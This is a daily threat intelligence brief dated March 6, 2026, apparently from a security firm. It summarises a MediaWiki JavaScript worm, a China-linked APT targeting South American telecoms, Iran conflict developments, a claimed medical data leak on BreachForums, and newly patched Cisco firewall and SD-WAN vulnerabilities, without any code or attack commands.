ZeroFox Daily Intelligence Brief - March 6, 2026
|by Alpha Team
ZeroFox Daily Intelligence Brief - March 6, 2026
ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- JavaScript Worm Modifies Thousands of Pages Across Meta-Wiki
- China-Linked UAT-9244 Targets South American Telcos
- Iran SITREP: Iranian APTs Allegedly Breach U.S. Networks, Hezbollah Warns Israeli Residentsd
JavaScript Worm Modifies Thousands of Pages Across Meta-Wiki
What we know: A malicious JavaScript worm briefly spread across Wikimedia Foundation infrastructure, primarily Meta-Wiki, and has since been contained. Close to 4,000 pages were modified and 85 user accounts had their common[.]js scripts replaced by the worm. The worm was accidentally triggered when a dormant script was activated during a security review.
Context: The worm was a self-propagating JavaScript script that spread through the scripting features of MediaWiki, which powers Wikipedia and other Wikimedia projects. It attempted persistence in two ways: replacing a user’s file (so the script would reload whenever the user logged in) and modifying the global MediaWiki:Common[.]js script (to enable the worm to execute for many editors loading the site).
Analyst note: Before containment, the worm likely self-propagated across multiple accounts and pages, modifying user scripts and injecting malicious loaders into shared scripts used by editors on Meta-Wiki.
China-Linked UAT-9244 Targets South American Telcos
What we know: A China-linked advanced persistent threat (APT) group, UAT-9244, has targeted telecommunications providers in South America since 2024, compromising popular operating systems and network-edge devices. The campaign used three malware families, TernDoor—a Windows backdoor, PeerTime—a Linux backdoor using BitTorrent, and BruteEntry—a brute-force scanner that builds operational relay boxes (ORBs).
Context: Edge devices that lack adequately enforced endpoint security controls are attractive targets for cyber attackers. In 2025, 14 enterprise technology zero-day vulnerabilities affected edge devices such as routers and switches. Most of these attacks appeared to be espionage-driven, with China-linked threat groups responsible for the majority of the activity.
Analyst note: Given that the malware strains in the group’s arsenal are for the purposes of establishing backdoors and for building proxy infrastructure through ORBs, the group is likely attempting to build botnet-like infrastructure out of insecure routers, embedded systems, and telecom network devices to collect information.
Iran SITREP: Iranian APTs Allegedly Breach U.S. Networks, Hezbollah Warns Israeli Residents
- Iranian APT MuddyWater reportedly embedded itself within multiple U.S. companies' networks using a previously unknown backdoor since early February. Separately, manufacturing and transportation sectors are reportedly being primarily targeted by Iran-linked APTs, which ZeroFox assesses is likely to cause significant supply chain disruptions and long-lasting downstream effects.
- Major economic indicators such as oil prices and global stock markets have only shifted moderately since declining on March 2, the first day of open trading. ZeroFox assesses that the data is consistent with belief that the Iran conflict will be short in duration. However, if Iran maintains enough offensive firepower, economic optimism will prove misplaced, and there will almost certainly be dramatic economic declines.
- Due to rising fuel costs, the Philippines is reportedly discussing a four-day work week as it imports nearly all of its oil. Additionally, the United States has offered India a 30-day waiver to purchase Russian oil as the conflict has stranded oil tankers near the Strait of Hormuz.
- Iran reportedly attempted to bomb a U.S. military base in Qatar using two Su-25 bomber jets, which were shot down by Qatar. This marks the first reported deployment of fixed-wing aircraft in offensive operations by Iran and likely demonstrates Iran’s desire to find an attack strategy that can bypass interceptor systems.
- Hezbollah has warned Israeli residents residing within 5 km (3.11 miles) of the border between the countries to evacuate. Meanwhile, an Iraqi militant group “Saraya Awliya al-Dam” has reportedly claimed to have struck a “vital” target in Jordan.
- Europol has warned that the conflict in the Middle East could quickly affect security across the European Union (EU), increasing the likelihood of terrorism, serious organized crime, violent extremism, and cyber-related threats.
- Etihad Airways has resumed limited flights from Abu Dhabi to several key destinations. The airways has also warned customers of fake accounts attempting to collect personal information.
DEEP AND DARK WEB INTELLIGENCE
BreachForums user NetRunnerPR: A threat actor named "NetRunnerPR" has claimed to have leaked data associated with Shiraume-kai Group, a Japan-based medical and social welfare organization, on deep and dark web forum BreachForums. The actor claims to have exfiltrated patients’ personally identifiable information (PII) and medical records. If legitimate, the dataset is likely to be used in phishing and social-engineering attacks or insurance fraud targeting exposed individuals.
VULNERABILITY AND EXPLOIT INTELLIGENCE
Cisco vulnerabilities: Cisco has released security patches for 48 new firewall vulnerabilities, including two critical ones, tracked as CVE-2026-20079 and CVE-2026-20131. Additionally, Cisco warned in an update to a February 2026 advisory that two Catalyst SD-WAN Manager security flaws (CVE-2026-20128 and CVE-2026-20122) are under active exploitation. The flaws are likely to be exploited individually or in chains by advanced threat actors to compromise corporate networks.
Affected products: The affected products are listed in this advisory.
Tags: DIB, tlp:green